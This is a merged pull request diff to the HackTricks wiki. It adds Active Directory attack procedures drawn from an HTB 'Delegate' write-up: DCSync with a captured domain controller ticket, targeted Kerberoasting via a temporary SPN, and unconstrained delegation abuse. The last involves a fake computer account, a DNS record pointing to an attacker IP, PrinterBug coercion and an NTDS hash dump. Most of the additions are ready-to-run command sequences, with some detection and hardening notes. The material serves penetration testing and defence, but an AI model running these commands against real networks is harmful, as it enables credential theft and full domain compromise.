Merge pull request #1401 from HackTricks-wiki/update_HTB__Delegate___SYSVOL_creds___Targeted_Kerberoast_20250912_182820

HTB Delegate — SYSVOL creds → Targeted Kerberoast → Unconstr...

src/windows-hardening/active-directory-methodology/dcsync.md

@@ -35,6 +35,24 @@ secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
 [-history] #To dump password history, may be helpful for offline password cracking
 ```
 
+### DCSync using a captured DC machine TGT (ccache)
+
+In unconstrained-delegation export-mode scenarios, you may capture a Domain Controller machine TGT (e.g., `DC1$@DOMAIN` for `krbtgt@DOMAIN`). You can then use that ccache to authenticate as the DC and perform DCSync without a password.
+
+```bash
+# Generate a krb5.conf for the realm (helper)
+netexec smb <DC_FQDN> --generate-krb5-file krb5.conf
+sudo tee /etc/krb5.conf < krb5.conf
+
+# netexec helper using KRB5CCNAME
+KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \
+  netexec smb <DC_FQDN> --use-kcache --ntds
+
+# Or Impacket with Kerberos from ccache
+KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \
+  secretsdump.py -just-dc -k -no-pass <DOMAIN>/ -dc-ip <DC_IP>
+```
+
 `-just-dc` generates 3 files:
 
 - one with the **NTLM hashes**
@@ -70,8 +88,6 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG
 
 - [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
 - [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
+- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-

src/windows-hardening/active-directory-methodology/kerberoast.md

@@ -155,6 +155,42 @@ Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=4}
 Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=28}
 ```
 
+#### Targeted Kerberoast via GenericWrite/GenericAll over a user (temporary SPN)
+
+When BloodHound shows that you have control over a user object (e.g., GenericWrite/GenericAll), you can reliably “targeted-roast” that specific user even if they do not currently have any SPNs:
+
+- Add a temporary SPN to the controlled user to make it roastable.
+- Request a TGS-REP encrypted with RC4 (etype 23) for that SPN to favor cracking.
+- Crack the `$krb5tgs$23$...` hash with hashcat.
+- Clean up the SPN to reduce footprint.
+
+Windows (PowerView/Rubeus):
+
+```powershell
+# Add temporary SPN on the target user
+Set-DomainObject -Identity <targetUser> -Set @{serviceprincipalname='fake/TempSvc-<rand>'} -Verbose
+
+# Request RC4 TGS for that user (single target)
+.\Rubeus.exe kerberoast /user:<targetUser> /nowrap /rc4
+
+# Remove SPN afterwards
+Set-DomainObject -Identity <targetUser> -Clear serviceprincipalname -Verbose
+```
+
+Linux one-liner (targetedKerberoast.py automates add SPN -> request TGS (etype 23) -> remove SPN):
+
+```bash
+targetedKerberoast.py -d '<DOMAIN>' -u <WRITER_SAM> -p '<WRITER_PASS>'
+```
+
+Crack the output with hashcat autodetect (mode 13100 for `$krb5tgs$23$`):
+
+```bash
+hashcat <outfile>.hash /path/to/rockyou.txt
+```
+
+Detection notes: adding/removing SPNs produces directory changes (Event ID 5136/4738 on the target user) and the TGS request generates Event ID 4769. Consider throttling and prompt cleanup.
+
 You can find useful tools for kerberoast attacks here: https://github.com/nidem/kerberoast
 
 If you find this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)` it’s due to local time skew. Sync to the DC:
@@ -233,10 +269,12 @@ asreproast.md
 
 ## References
 
+- [https://github.com/ShutdownRepo/targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast)
 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
 - Microsoft Security Blog (2024-10-11) – Microsoft’s guidance to help mitigate Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/
 - SpecterOps – Rubeus Roasting documentation: https://docs.specterops.io/ghostpack/rubeus/roasting
+- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html
 
 {{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/unconstrained-delegation.md

@@ -58,11 +58,109 @@ Find here other ways to **force an authentication:**
 printers-spooler-service-abuse.md
 {{#endref}}
 
+### Abusing Unconstrained Delegation with an attacker-created computer
+
+Modern domains often have `MachineAccountQuota > 0` (default 10), allowing any authenticated principal to create up to N computer objects. If you also hold the `SeEnableDelegationPrivilege` token privilege (or equivalent rights), you can set the newly created computer to be trusted for unconstrained delegation and harvest inbound TGTs from privileged systems.
+
+High-level flow:
+
+1) Create a computer you control
+
+```bash
+# Impacket addcomputer.py (any authenticated user if MachineAccountQuota > 0)
+addcomputer.py -computer-name <FAKEHOST> -computer-pass '<Strong.Passw0rd>' -dc-ip <DC_IP> <DOMAIN>/<USER>:'<PASS>'
+```
+
+2) Make the fake hostname resolvable inside the domain
+
+```bash
+# krbrelayx dnstool.py - add an A record for the host FQDN to point to your listener IP
+python3 dnstool.py -u '<DOMAIN>\\<FAKEHOST>$' -p '<Strong.Passw0rd>' \
+  --action add --record <FAKEHOST>.<DOMAIN_FQDN> --type A --data <ATTACKER_IP> \
+  -dns-ip <DC_IP> <DC_FQDN>
+```
+
+3) Enable Unconstrained Delegation on the attacker-controlled computer
+
+```bash
+# Requires SeEnableDelegationPrivilege (commonly held by domain admins or delegated admins)
+# BloodyAD example
+bloodyAD -d <DOMAIN_FQDN> -u <USER> -p '<PASS>' --host <DC_FQDN> add uac '<FAKEHOST>$' -f TRUSTED_FOR_DELEGATION
+```
+
+Why this works: with unconstrained delegation, the LSA on a delegation-enabled computer caches inbound TGTs. If you trick a DC or privileged server to authenticate to your fake host, its machine TGT will be stored and can be exported.
+
+4) Start krbrelayx in export mode and prepare the machine NT hash
+
+```bash
+# Compute NT hash (MD4 over UTF-16LE) of the machine account password
+python3 - << 'PY'
+password = '<Strong.Passw0rd>'
+import hashlib
+print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())
+PY
+# Launch krbrelayx to export any inbound TGTs
+python3 krbrelayx.py -hashes :<NT_HASH>
+```
+
+5) Coerce authentication from the DC/servers to your fake host
+
+```bash
+# netexec (CME fork) coerce_plus module supports multiple coercion vectors
+# Common options: METHOD=PrinterBug|PetitPotam|DFSCoerce|MSEven
+netexec smb <DC_FQDN> -u '<FAKEHOST>$' -p '<Strong.Passw0rd>' -M coerce_plus -o LISTENER=<FAKEHOST>.<DOMAIN_FQDN> METHOD=PrinterBug
+```
+
+krbrelayx will save ccache files when a machine authenticates, for example:
+
+```
+Got ticket for DC1$@DOMAIN.TLD [krbtgt@DOMAIN.TLD]
+Saving ticket in DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache
+```
+
+6) Use the captured DC machine TGT to perform DCSync
+
+```bash
+# Create a krb5.conf for the realm (netexec helper)
+netexec smb <DC_FQDN> --generate-krb5-file krb5.conf
+sudo tee /etc/krb5.conf < krb5.conf
+
+# Use the saved ccache to DCSync (netexec helper)
+KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \
+  netexec smb <DC_FQDN> --use-kcache --ntds
+
+# Alternatively with Impacket (Kerberos from ccache)
+KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \
+  secretsdump.py -just-dc -k -no-pass <DOMAIN>/ -dc-ip <DC_IP>
+```
+
+Notes and requirements:
+
+- `MachineAccountQuota > 0` enables unprivileged computer creation; otherwise you need explicit rights.
+- Setting `TRUSTED_FOR_DELEGATION` on a computer requires `SeEnableDelegationPrivilege` (or domain admin).
+- Ensure name resolution to your fake host (DNS A record) so the DC can reach it by FQDN.
+- Coercion requires a viable vector (PrinterBug/MS-RPRN, EFSRPC/PetitPotam, DFSCoerce, MS-EVEN, etc.). Disable these on DCs if possible.
+
+Detection and hardening ideas:
+
+- Alert on Event ID 4741 (computer account created) and 4742/4738 (computer/user account changed) when UAC `TRUSTED_FOR_DELEGATION` is set.
+- Monitor for unusual DNS A-record additions in the domain zone.
+- Watch for spikes in 4768/4769 from unexpected hosts and DC-authentications to non-DC hosts.
+- Restrict `SeEnableDelegationPrivilege` to a minimal set, set `MachineAccountQuota=0` where feasible, and disable Print Spooler on DCs. Enforce LDAP signing and channel binding.
+
 ### Mitigation
 
 - Limit DA/Admin logins to specific services
 - Set "Account is sensitive and cannot be delegated" for privileged accounts.
 
+## References
+
+- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html
+- harmj0y – S4U2Pwnage: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
+- ired.team – Domain compromise via unrestricted delegation: https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation
+- krbrelayx: https://github.com/dirkjanm/krbrelayx
+- Impacket addcomputer.py: https://github.com/fortra/impacket
+- BloodyAD: https://github.com/CravateRouge/bloodyAD
+- netexec (CME fork): https://github.com/Pennyw0rth/NetExec
+
 {{#include ../../banners/hacktricks-training.md}}
-
-